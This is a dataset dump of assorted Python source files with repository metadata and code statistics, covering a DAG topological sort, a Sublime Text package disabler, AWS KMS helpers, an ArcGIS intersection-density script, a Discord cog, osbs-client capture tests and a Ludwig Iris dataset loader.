b6025c07a550e6b64ea088e2d2ae6f07c65add55 | 2,154 | py | Python | congregation/dag/dag.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | 3 | 2020-10-05T16:30:15.000Z | 2021-01-22T13:38:02.000Z | congregation/dag/dag.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | null | null | null | congregation/dag/dag.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | 1 | 2021-02-19T12:40:57.000Z | 2021-02-19T12:40:57.000Z | from congregation.dag.nodes import OpNode
class Dag:
def __init__(self, roots: set):
self.roots = roots
def __str__(self):
return "\n".join(str(node) for node in self.top_sort())
def involves_compute_party(self, pid: int):
"""
For a given PID, check if it owns any
data associated with this DAG
"""
for r in self.roots:
for sw_set in r.out_rel.stored_with:
if pid in sw_set:
return True
return False
def dfs_visit(self, visitor):
visited = set()
for root in self.roots:
self._dfs_visit(root, visitor, visited)
return visited
def _dfs_visit(self, node: OpNode, visitor, visited: set):
visitor(node)
visited.add(node)
for child in node.children:
if child not in visited:
self._dfs_visit(child, visitor, visited)
def dfs_print(self):
self.dfs_visit(print)
def get_all_nodes(self):
return self.dfs_visit(lambda node: node)
def top_sort(self):
unmarked = sorted(list(self.get_all_nodes()), key=lambda x: x.out_rel.name)
marked = set()
temp_marked = set()
ordered = []
while unmarked:
node = unmarked.pop()
self._top_sort_visit(node, marked, temp_marked, unmarked, ordered)
return ordered
def _top_sort_visit(self, node: OpNode, marked: set, temp_marked: set, unmarked: [list, set], ordered: list):
if node in temp_marked:
raise Exception(f"Cycle detected in graph, not a dag: Node {node} was in {temp_marked}.")
if node not in marked:
if node in unmarked:
unmarked.remove(node)
temp_marked.add(node)
children = sorted(list(node.children), key=lambda x: x.out_rel.name)
for other_node in children:
self._top_sort_visit(other_node, marked, temp_marked, unmarked, ordered)
marked.add(node)
unmarked.append(node)
temp_marked.remove(node)
ordered.insert(0, node)
| 28.342105 | 113 | 0.587744 | 281 | 2,154 | 4.323843 | 0.284698 | 0.065844 | 0.039506 | 0.024691 | 0.128395 | 0.092181 | 0.034568 | 0 | 0 | 0 | 0 | 0.000684 | 0.321727 | 2,154 | 75 | 114 | 28.72 | 0.830938 | 0.031105 | 0 | 0 | 0 | 0 | 0.03455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.18 | false | 0 | 0.02 | 0.04 | 0.34 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b602707d9d2d61f75e1f77871a6e22ddd13d0a1e | 8,940 | py | Python | package_control/package_disabler_iterator.py | evandrocoan/package_control | bb17c851fa2dee0e564128ea4a499087f2d2ec45 | [
"MIT"
] | 2 | 2018-12-08T21:44:59.000Z | 2021-11-27T05:14:02.000Z | package_control/package_disabler_iterator.py | evandrocoan/package_control | bb17c851fa2dee0e564128ea4a499087f2d2ec45 | [
"MIT"
] | 3 | 2018-02-09T04:14:30.000Z | 2018-10-08T14:40:36.000Z | package_control/package_disabler_iterator.py | evandrocoan/package_control | bb17c851fa2dee0e564128ea4a499087f2d2ec45 | [
"MIT"
] | null | null | null |
import sublime
import time
import functools
from .settings import run_on_main_thread
from .package_disabler import PackageDisabler
# How many packages to ignore and unignore in batch to fix the ignored packages bug error
PACKAGES_COUNT_TO_IGNORE_AHEAD = 8
# The minimum time between multiple calls setting the `ignored_packages` setting, without triggering
# the Sublime Text error `It appears a package is trying to ignore itself, causing a loop`
IGNORE_PACKAGE_MINIMUM_WAIT_TIME = 3.7
g_next_packages_to_ignore = []
g_default_ignored_packages = []
def sublime_settings():
settings_name = "Preferences.sublime-settings"
return sublime.load_settings( settings_name )
def save_sublime_settings():
settings_name = "Preferences.sublime-settings"
sublime.save_settings( settings_name )
def packagesmanager_settings():
settings_name = "PackagesManager.sublime-settings"
return sublime.load_settings( settings_name )
def save_packagesmanager_settings():
settings_name = "PackagesManager.sublime-settings"
sublime.save_settings( settings_name )
def unique_list_append(a_list, *lists):
for _list in lists:
for item in _list:
if item not in a_list:
a_list.append( item )
def save_ignored_packages_callback():
packagesmanager_settings().set( 'next_packages_to_ignore', g_next_packages_to_ignore )
save_packagesmanager_settings()
def clean_ignored_packages_callback():
packagesmanager_settings().erase( 'next_packages_to_ignore' )
save_packagesmanager_settings()
class IgnoredPackagesBugFixer(object):
_is_running = False
def __init__(self, package_list_to_process, ignoring_type="install"):
assert not IgnoredPackagesBugFixer._is_running, "IgnoredPackagesBugFixer is a Singleton and it is already running! Did you forget to stop it?"
IgnoredPackagesBugFixer._is_running = True
self.package_list_to_process = package_list_to_process
self.package_disabler = PackageDisabler()
self.uningored_packages_to_flush = 0
# Value to pass to Package Control PackageDisabler:
# - "upgrade"
# - "remove"
# - "install"
# - "disable"
# - "loader"
self.ignoring_type = ignoring_type
global g_default_ignored_packages
global g_next_packages_to_ignore
g_next_packages_to_ignore = packagesmanager_settings().get( 'next_packages_to_ignore', [] )
g_default_ignored_packages = self.setup_packages_ignored_list( packages_to_remove=g_next_packages_to_ignore )
def __iter__(self):
package_list_to_process = self.package_list_to_process
for package_name in package_list_to_process:
self.ignore_next_packages( package_name, package_list_to_process )
# To here, you can do anything with your package on `package_name` variable, because
# the functions ignore_next_packages() and accumulative_unignore_user_packages()
# will take care of everything to ensure they are disabled and reenabled.
yield package_name
self.accumulative_unignore_user_packages( package_name )
# Ensure the list is clean when process finishes
self.stop()
def stop(self):
"""
If the iteration is stopped by a break statement, this must to be called before break.
"""
self.accumulative_unignore_user_packages( flush_everything=True )
run_on_main_thread( clean_ignored_packages_callback )
IgnoredPackagesBugFixer._is_running = False
def skip_reenable(self, package_name):
if package_name in g_next_packages_to_ignore:
g_next_packages_to_ignore.remove( package_name )
else:
print( "PackagesManager: The package `%s` is not marked to be unignored." % package_name )
def ignore_next_packages(self, package_name, packages_list):
if self.uningored_packages_to_flush < 1:
global g_next_packages_to_ignore
last_ignored_packages = packages_list.index( package_name )
g_next_packages_to_ignore.extend( packages_list[last_ignored_packages : last_ignored_packages+PACKAGES_COUNT_TO_IGNORE_AHEAD+1] )
# If the package is already on the users' `ignored_packages` settings, it means either that
# the package was disabled by the user, therefore we must not unignore it later when unignoring them.
for package_name in list( g_next_packages_to_ignore ):
if package_name in g_default_ignored_packages:
print( "PackagesManager: Warning, the package `%s` could not be ignored because it already ignored." % package_name )
g_next_packages_to_ignore.remove( package_name )
g_next_packages_to_ignore.sort()
# Let the packages be unloaded by Sublime Text while ensuring anyone is putting them back in
self.setup_packages_ignored_list( packages_to_add=g_next_packages_to_ignore )
def accumulative_unignore_user_packages(self, package_name="", flush_everything=False):
"""
@param flush_everything set all remaining packages as unignored
"""
if flush_everything:
self.setup_packages_ignored_list( packages_to_remove=g_next_packages_to_ignore )
self.clear_next_ignored_packages()
else:
print( "PackagesManager: Adding package to unignore list: %s" % str( package_name ) )
self.uningored_packages_to_flush += 1
if self.uningored_packages_to_flush >= len( g_next_packages_to_ignore ):
self.setup_packages_ignored_list( packages_to_remove=g_next_packages_to_ignore )
self.clear_next_ignored_packages()
def clear_next_ignored_packages(self):
del g_next_packages_to_ignore[:]
self.uningored_packages_to_flush = 0
def setup_packages_ignored_list(self, packages_to_add=[], packages_to_remove=[]):
"""
Flush just a few items each time. Let the packages be unloaded by Sublime Text while
ensuring anyone is putting them back in.
Randomly reverting back the `ignored_packages` setting on batch operations
https://github.com/SublimeTextIssues/Core/issues/2132
"""
currently_ignored = sublime_settings().get( "ignored_packages", [] )
packages_to_add.sort()
packages_to_remove.sort()
print( "PackagesManager: Currently ignored packages: " + str( currently_ignored ) )
print( "PackagesManager: Ignoring the packages: " + str( packages_to_add ) )
print( "PackagesManager: Unignoring the packages: " + str( packages_to_remove ) )
currently_ignored = [package_name for package_name in currently_ignored if package_name not in packages_to_remove]
unique_list_append( currently_ignored, packages_to_add )
currently_ignored.sort()
# This adds them to the `in_process` list on the Package Control.sublime-settings file
if len( packages_to_add ):
# We use a functools.partial to generate the on-complete callback in
# order to bind the current value of the parameters, unlike lambdas.
closure = functools.partial( self.package_disabler.disable_packages, list(packages_to_add), self.ignoring_type )
run_on_main_thread( closure )
time.sleep( IGNORE_PACKAGE_MINIMUM_WAIT_TIME )
# This should remove them from the `in_process` list on the Package Control.sublime-settings file
if len( packages_to_remove ):
# We use a functools.partial to generate the on-complete callback in
# order to bind the current value of the parameters, unlike lambdas.
closure = functools.partial( self.package_disabler.reenable_package, list(packages_to_remove), self.ignoring_type )
run_on_main_thread( closure )
time.sleep( IGNORE_PACKAGE_MINIMUM_WAIT_TIME )
def main_callback():
sublime_settings().set( "ignored_packages", currently_ignored )
save_sublime_settings()
# Something, somewhere is setting the ignored_packages list back to `["Vintage"]`. Then
# ensure we override this.
for interval in range( 0, 27 ):
run_on_main_thread( main_callback )
time.sleep( IGNORE_PACKAGE_MINIMUM_WAIT_TIME )
new_ignored_list = sublime_settings().get( "ignored_packages", [] )
print( "PackagesManager: Currently ignored packages: " + str( new_ignored_list ) )
if new_ignored_list:
if len( new_ignored_list ) == len( currently_ignored ) \
and new_ignored_list == currently_ignored:
break
run_on_main_thread( save_ignored_packages_callback )
return currently_ignored
| 40.821918 | 150 | 0.702908 | 1,103 | 8,940 | 5.349048 | 0.197643 | 0.071186 | 0.056949 | 0.067797 | 0.469153 | 0.384576 | 0.315593 | 0.249661 | 0.209153 | 0.202203 | 0 | 0.002193 | 0.234899 | 8,940 | 218 | 151 | 41.009174 | 0.86038 | 0.21443 | 0 | 0.230769 | 0 | 0 | 0.105087 | 0.030814 | 0 | 0 | 0 | 0 | 0.008547 | 1 | 0.136752 | false | 0 | 0.042735 | 0 | 0.222222 | 0.059829 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b604ed726ad0c27b4c9c8cb853054f3c1f6e34f0 | 1,125 | py | Python | djenga/encryption/kms.py | 2ps/djenga | 85ac2c7b0b0e80b55aff43f027814d05b9b0532c | [
"BSD-3-Clause"
] | 6 | 2015-01-18T10:31:13.000Z | 2019-06-14T17:39:58.000Z | djenga/encryption/kms.py | 2ps/djenga | 85ac2c7b0b0e80b55aff43f027814d05b9b0532c | [
"BSD-3-Clause"
] | 12 | 2015-05-03T06:58:00.000Z | 2019-06-26T21:58:16.000Z | djenga/encryption/kms.py | 2ps/djenga | 85ac2c7b0b0e80b55aff43f027814d05b9b0532c | [
"BSD-3-Clause"
] | 1 | 2018-04-27T20:36:29.000Z | 2018-04-27T20:36:29.000Z | from .helpers import _as_bytes
from .helpers import b64_str
from .helpers import from_b64_str
from .helpers import _get_client
from .helpers import _prefix_alias
def encrypt_bytes(
plain_text: bytes
, alias: str
, region: str = None
, profile: str = None) -> bytes:
client = _get_client(region, profile)
alias = _prefix_alias(alias)
data = client.encrypt(KeyId=alias, Plaintext=plain_text)
return data['CiphertextBlob']
def decrypt_bytes(
cipher_text: bytes
, region: str = None
, profile: str = None) -> bytes:
client = _get_client(region, profile)
data = client.decrypt(CiphertextBlob=cipher_text)
return data['Plaintext']
def encrypt(plain_text, alias, region: str = None, profile: str = None) -> str:
plain_text = _as_bytes(plain_text)
data = encrypt_bytes(plain_text, alias, region, profile)
return b64_str(data)
def decrypt(cipher_text: str, region: str = None, profile: str = None):
cipher_text = from_b64_str(cipher_text)
data = decrypt_bytes(cipher_text, region, profile)
return data.decode('utf-8')
| 29.605263 | 79 | 0.691556 | 148 | 1,125 | 5.013514 | 0.189189 | 0.075472 | 0.114555 | 0.107817 | 0.304582 | 0.242588 | 0.206199 | 0.161725 | 0.161725 | 0.161725 | 0 | 0.010147 | 0.211556 | 1,125 | 37 | 80 | 30.405405 | 0.826381 | 0 | 0 | 0.206897 | 0 | 0 | 0.024889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0 | 0.172414 | 0 | 0.448276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b6067da1a3d8144b0aacdb78ebe92f0d1ae4957c | 3,275 | py | Python | Testing/intersection_densityTEST.py | djconly85/PPA2_0_code | 1d67934eb3bc3c7df16cdd5867639b92c9ea45eb | [
"MIT"
] | null | null | null | Testing/intersection_densityTEST.py | djconly85/PPA2_0_code | 1d67934eb3bc3c7df16cdd5867639b92c9ea45eb | [
"MIT"
] | null | null | null | Testing/intersection_densityTEST.py | djconly85/PPA2_0_code | 1d67934eb3bc3c7df16cdd5867639b92c9ea45eb | [
"MIT"
] | null | null | null | # --------------------------------
# Name: transit_svc_measure.py
# Purpose: Get count of intersection density per acre
#
#
# Author: Darren Conly
# Last Updated: <date>
# Updated by: <name>
# Copyright: (c) SACOG
# Python Version: 3.x
# --------------------------------
import gc
import sys
import arcpy
# import ppa_input_params as params
def trace():
import traceback, inspect
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
# script name + line number
line = tbinfo.split(", ")[1]
filename = inspect.getfile(inspect.currentframe())
# Get Python syntax error
synerror = traceback.format_exc().splitlines()[-1]
return line, filename, synerror
def get_poly_area(poly_fl):
buff_area_ft2 = 0
with arcpy.da.SearchCursor(poly_fl, ["SHAPE@AREA"]) as cur:
for row in cur:
buff_area_ft2 += row[0]
buff_acre = buff_area_ft2 / 43560 # convert from ft2 to acres. may need to adjust for projection-related issues. See PPA1 for more info
return buff_acre
def intersection_density(fc_project, fc_intersxns, project_type):
try:
arcpy.AddMessage("Calculating intersection density...")
fl_project = "fl_projline"
fl_intersxns = "fl_trnstp"
if arcpy.Exists(fl_project): arcpy.Delete_management(fl_project)
arcpy.MakeFeatureLayer_management(fc_project, fl_project)
if arcpy.Exists(fl_intersxns): arcpy.Delete_management(fl_intersxns)
arcpy.MakeFeatureLayer_management(fc_intersxns, fl_intersxns)
# analysis area. If project is line or point, then it's a buffer around the line/point.
# If it's a polygon (e.g. ctype or region), then no buffer and analysis area is that within the input polygon
if project_type == "AGG":
fc_buff = fc_project
else:
buffdist = 1320 # feet
fc_buff = r"memory\temp_buff_qmi"
arcpy.Buffer_analysis(fl_project, fc_buff, buffdist)
fl_buff = "fl_buff"
if arcpy.Exists(fl_buff): arcpy.Delete_management(fl_buff)
arcpy.MakeFeatureLayer_management(fc_buff, fl_buff)
buff_acres = get_poly_area(fl_buff)
# get count of transit stops within buffer
arcpy.SelectLayerByLocation_management(fl_intersxns, "INTERSECT", fl_buff, 0, "NEW_SELECTION")
intsxn_34 = 0
col_link_cnt = "LINKS"
with arcpy.da.SearchCursor(fl_intersxns, [col_link_cnt]) as cur:
for row in cur:
if row[0] > 2:
intsxn_34 += 1
intersxns_per_acre = intsxn_34 / buff_acres if buff_acres > 0 else 0
arcpy.Delete_management(fl_intersxns)
gc.collect()
msg = "SUCCESS - intersections per acre: {}".format(intersxns_per_acre)
except:
msg = trace()
return msg
if __name__ == '__main__':
arcpy.env.workspace = r'I:\Projects\Darren\PPA_V2_GIS\ForESRI\Layers4ESRI_03172020.gdb'
proj_line_fc = arcpy.GetParameterAsText(0)
intersxns_fc = 'intersections_2016'
proj_type = "Line project"
output = intersection_density(proj_line_fc, intersxns_fc, proj_type)
arcpy.SetParameterAsText(1, output)
| 31.190476 | 140 | 0.643359 | 417 | 3,275 | 4.810552 | 0.386091 | 0.023928 | 0.041874 | 0.045862 | 0.047856 | 0.015952 | 0 | 0 | 0 | 0 | 0 | 0.0204 | 0.251603 | 3,275 | 104 | 141 | 31.490385 | 0.798042 | 0.205802 | 0 | 0.034483 | 0 | 0 | 0.100736 | 0.024022 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051724 | false | 0 | 0.068966 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b60cc9c298430cfb0532fa24f8e831ee7ebc2637 | 308 | py | Python | utilities/extract-files.py | ukgamesfund/registry-blockchain | 73b12a36b7af5df3235f1b91939b8fd59b213b9f | [
"MIT"
] | null | null | null | utilities/extract-files.py | ukgamesfund/registry-blockchain | 73b12a36b7af5df3235f1b91939b8fd59b213b9f | [
"MIT"
] | null | null | null | utilities/extract-files.py | ukgamesfund/registry-blockchain | 73b12a36b7af5df3235f1b91939b8fd59b213b9f | [
"MIT"
] | null | null | null | import json,os,sys
filename = sys.argv[1]
file_path = "../build/contracts/"+filename
content = open(file_path, "r").read()
object = json.loads(content)
abi = json.dumps(object['abi'], indent=2)
bin = object['unlinked_binary'][2:]
open(filename+".abi","w").write(abi)
open(filename+".bin","w").write(bin)
| 22 | 42 | 0.681818 | 47 | 308 | 4.404255 | 0.553191 | 0.077295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010714 | 0.090909 | 308 | 13 | 43 | 23.692308 | 0.728571 | 0 | 0 | 0 | 0 | 0 | 0.156352 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b60cefb60f76a4f016c09e520a3873524a38f0fc | 499 | py | Python | trinity/tests/test_bonds.py | elliothevel/trinity | af4425e6432f6edd7c56478b039eab654c5fec26 | [
"MIT"
] | null | null | null | trinity/tests/test_bonds.py | elliothevel/trinity | af4425e6432f6edd7c56478b039eab654c5fec26 | [
"MIT"
] | null | null | null | trinity/tests/test_bonds.py | elliothevel/trinity | af4425e6432f6edd7c56478b039eab654c5fec26 | [
"MIT"
] | null | null | null | import trinity.bonds as bonds
import trinity.returns as returns
def test_simulate_returns(expected_bond_returns):
"""Ensure simulated returns match published results."""
interest_rates = [(year['rate'], year['rate_long'])
for year in returns.read_shiller()]
simulated_returns = bonds.simulate_returns(interest_rates)
for simulated, expected in zip(simulated_returns, expected_bond_returns):
assert abs(simulated - expected['total_return']) < 0.0002
| 35.642857 | 77 | 0.727455 | 61 | 499 | 5.721311 | 0.508197 | 0.137536 | 0.108883 | 0.148997 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.178357 | 499 | 13 | 78 | 38.384615 | 0.839024 | 0.098196 | 0 | 0 | 0 | 0 | 0.056306 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b60cff1aa58f85db479507a365921e43a1e5cf4d | 705 | py | Python | karutakeqingautoreact/karutakeqingautoreact.py | RealCyGuy/modmail-plugins | e515f827eb3fedf8456fbb5ff65a4e5fa81ab72e | [
"MIT"
] | 8 | 2020-01-03T19:01:59.000Z | 2021-04-14T13:30:49.000Z | karutakeqingautoreact/karutakeqingautoreact.py | RealCyGuy/modmail-plugins | e515f827eb3fedf8456fbb5ff65a4e5fa81ab72e | [
"MIT"
] | 4 | 2020-12-22T12:51:03.000Z | 2022-01-05T20:17:00.000Z | karutakeqingautoreact/karutakeqingautoreact.py | RealCyGuy/modmail-plugins | e515f827eb3fedf8456fbb5ff65a4e5fa81ab72e | [
"MIT"
] | 27 | 2020-01-17T18:05:29.000Z | 2022-02-04T07:38:52.000Z | import discord
from discord.ext import commands
class KarutaKeqingAutoReact(commands.Cog):
"""
Reacts to karuta character lookup and collection for keqing bot.
"""
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.author.id == 646937666251915264 and message.embeds:
embed = message.embeds[0]
if embed.title.startswith("Card Collection"):
await message.add_reaction("📝")
elif embed.title.startswith("Character Lookup"):
await message.add_reaction("🖌️")
def setup(bot):
bot.add_cog(KarutaKeqingAutoReact(bot))
| 29.375 | 70 | 0.652482 | 81 | 705 | 5.617284 | 0.518519 | 0.048352 | 0.087912 | 0.101099 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035581 | 0.242553 | 705 | 23 | 71 | 30.652174 | 0.810861 | 0.09078 | 0 | 0 | 0 | 0 | 0.0544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b60ef291cf0091e55fe384f99b9ffc4eb76852f2 | 4,035 | py | Python | tests/cli/test_capture.py | lkolacek/osbs-client | 90c6db9a414214c681c777468079bcbe7dd7c809 | [
"BSD-3-Clause"
] | 4 | 2020-05-16T22:30:32.000Z | 2021-11-09T22:26:38.000Z | tests/cli/test_capture.py | lkolacek/osbs-client | 90c6db9a414214c681c777468079bcbe7dd7c809 | [
"BSD-3-Clause"
] | 183 | 2019-06-06T09:10:24.000Z | 2022-03-30T12:05:15.000Z | tests/cli/test_capture.py | lkolacek/osbs-client | 90c6db9a414214c681c777468079bcbe7dd7c809 | [
"BSD-3-Clause"
] | 10 | 2019-10-29T21:55:03.000Z | 2021-01-18T14:20:34.000Z | """
Copyright (c) 2015, 2019 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import absolute_import
import json
import os
import responses
import yaml
from tempfile import NamedTemporaryFile
from textwrap import dedent
from osbs.cli.capture import setup_json_capture
from osbs.tekton import PipelineRun
from osbs.conf import Configuration
from osbs.api import OSBS
from tests.constants import TEST_PIPELINE_RUN_TEMPLATE, TEST_OCP_NAMESPACE
PIPELINE_RUN_NAME = 'source-container-x-x-default'
OPENSHIFT_URL = 'https://openshift.testing'
PIPELINE_RUN_URL = f'{OPENSHIFT_URL}/apis/tekton.dev/v1beta1/namespaces/{TEST_OCP_NAMESPACE}/pipelineruns/{PIPELINE_RUN_NAME}' # noqa E501
PIPELINE_RUN_URL = f'https://openshift.testing/apis/tekton.dev/v1beta1/namespaces/{TEST_OCP_NAMESPACE}/pipelineruns/{PIPELINE_RUN_NAME}' # noqa E501
PIPELINE_WATCH_URL = f'https://openshift.testing/apis/tekton.dev/v1beta1/watch/namespaces/{TEST_OCP_NAMESPACE}/pipelineruns/{PIPELINE_RUN_NAME}/' # noqa E501
TASK_RUN_NAME = 'test-task-run-1'
POD_NAME = 'test-pod'
PIPELINE_RUN_JSON = {"metadata": {"name": "name"},
"status": {"conditions": [{"reason": "Running", "status": "Unknown"}]}}
PIPELINE_RUN_WATCH_JSON = {"type": "ADDED", "object": PIPELINE_RUN_JSON}
with open(TEST_PIPELINE_RUN_TEMPLATE) as f:
yaml_data = f.read()
PIPELINE_RUN_DATA = yaml.safe_load(yaml_data)
def osbs_for_capture(tmpdir):
kwargs = {'build_json_dir': 'inputs', 'openshift_url': OPENSHIFT_URL,
'namespace': TEST_OCP_NAMESPACE}
with NamedTemporaryFile(mode="wt") as fp:
config = dedent("""\
[general]
build_json_dir = {build_json_dir}
[default]
openshift_url = {openshift_url}
use_auth = false
namespace = {namespace}
""")
fp.write(config.format(**kwargs))
fp.flush()
dummy_config = Configuration(fp.name, conf_section='default')
osbs = OSBS(dummy_config)
setup_json_capture(osbs, osbs.os_conf, str(tmpdir))
return osbs
def pipeline_run(osbs_for_capture):
return PipelineRun(os=osbs_for_capture.os, pipeline_run_name=PIPELINE_RUN_NAME,
pipeline_run_data=PIPELINE_RUN_DATA)
@responses.activate
def test_json_capture_no_watch(tmpdir):
osbs = osbs_for_capture(tmpdir)
prun = pipeline_run(osbs)
for visit in ["000", "001"]:
responses.add(responses.GET, PIPELINE_RUN_URL, json=PIPELINE_RUN_JSON)
prun.get_info()
filename = "get-tekton.dev_v1beta1_namespaces_{n}_pipelineruns_{p}-{v}.json"
path = os.path.join(str(tmpdir), filename.format(n=TEST_OCP_NAMESPACE,
v=visit, p=PIPELINE_RUN_NAME))
assert os.access(path, os.R_OK)
with open(path) as fp:
obj = json.load(fp)
assert obj
@responses.activate
def test_json_capture_watch(tmpdir):
osbs = osbs_for_capture(tmpdir)
prun = pipeline_run(osbs)
responses.add(
responses.GET,
PIPELINE_WATCH_URL,
json=PIPELINE_RUN_WATCH_JSON,
)
responses.add(responses.GET, PIPELINE_RUN_URL, json=PIPELINE_RUN_JSON)
prun.wait_for_start()
watch_filename = "get-tekton.dev_v1beta1_watch_namespaces_{n}_pipelineruns_{p}_-000-000.json"
get_filename = "get-tekton.dev_v1beta1_namespaces_{n}_pipelineruns_{p}-000.json"
watch_path = os.path.join(str(tmpdir), watch_filename.format(n=TEST_OCP_NAMESPACE,
p=PIPELINE_RUN_NAME))
get_path = os.path.join(str(tmpdir), get_filename.format(n=TEST_OCP_NAMESPACE,
p=PIPELINE_RUN_NAME))
for path in (watch_path, get_path):
assert os.access(path, os.R_OK)
with open(path) as fp:
obj = json.load(fp)
assert obj
| 35.086957 | 157 | 0.680297 | 527 | 4,035 | 4.916509 | 0.259962 | 0.114628 | 0.052103 | 0.040139 | 0.450405 | 0.396372 | 0.33076 | 0.33076 | 0.33076 | 0.264377 | 0 | 0.014223 | 0.215861 | 4,035 | 114 | 158 | 35.394737 | 0.804678 | 0.051053 | 0 | 0.219512 | 0 | 0.02439 | 0.251113 | 0.086934 | 0 | 0 | 0 | 0 | 0.04878 | 1 | 0.04878 | false | 0 | 0.146341 | 0.012195 | 0.219512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b60f51942494a012c87412de5d38d61489e17976 | 2,162 | py | Python | ludwig/datasets/iris/__init__.py | dantreiman/ludwig | daeffd21f9eef524afb2037763abd07a93228c2a | [
"Apache-2.0"
] | 7,739 | 2019-02-11T14:06:31.000Z | 2020-12-16T18:30:29.000Z | ludwig/datasets/iris/__init__.py | dantreiman/ludwig | daeffd21f9eef524afb2037763abd07a93228c2a | [
"Apache-2.0"
] | 769 | 2019-02-11T16:13:20.000Z | 2020-12-16T17:26:11.000Z | ludwig/datasets/iris/__init__.py | dantreiman/ludwig | daeffd21f9eef524afb2037763abd07a93228c2a | [
"Apache-2.0"
] | 975 | 2019-02-11T15:55:54.000Z | 2020-12-14T21:45:39.000Z | #! /usr/bin/env python
# Copyright (c) 2022 Predibase, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import pandas as pd
from ludwig.datasets.base_dataset import BaseDataset, DEFAULT_CACHE_LOCATION
from ludwig.datasets.mixins.download import UncompressedFileDownloadMixin
from ludwig.datasets.mixins.load import CSVLoadMixin
from ludwig.datasets.registry import register_dataset
from ludwig.utils.fs_utils import makedirs
def load(cache_dir=DEFAULT_CACHE_LOCATION, split=False):
if split:
raise ValueError("Iris dataset does not contain a split column")
dataset = Iris(cache_dir=cache_dir)
return dataset.load(split=split)
@register_dataset(name="iris")
class Iris(UncompressedFileDownloadMixin, CSVLoadMixin, BaseDataset):
"""The Iris dataset.
Additional Details:
https://archive.ics.uci.edu/ml/datasets/Iris
"""
def __init__(self, cache_dir=DEFAULT_CACHE_LOCATION):
super().__init__(dataset_name="iris", cache_dir=cache_dir)
def process_downloaded_dataset(self):
raw_df = pd.read_csv(os.path.join(self.raw_dataset_path, self.data_filename))
columns = [
"sepal_length_cm",
"sepal_width_cm",
"petal_length_cm",
"petal_width_cm",
"class",
]
raw_df.columns = columns
makedirs(self.processed_dataset_path, exist_ok=True)
raw_df.to_csv(os.path.join(self.processed_dataset_path, self.csv_filename), index=False)
@property
def data_filename(self):
return self.config["data_filename"]
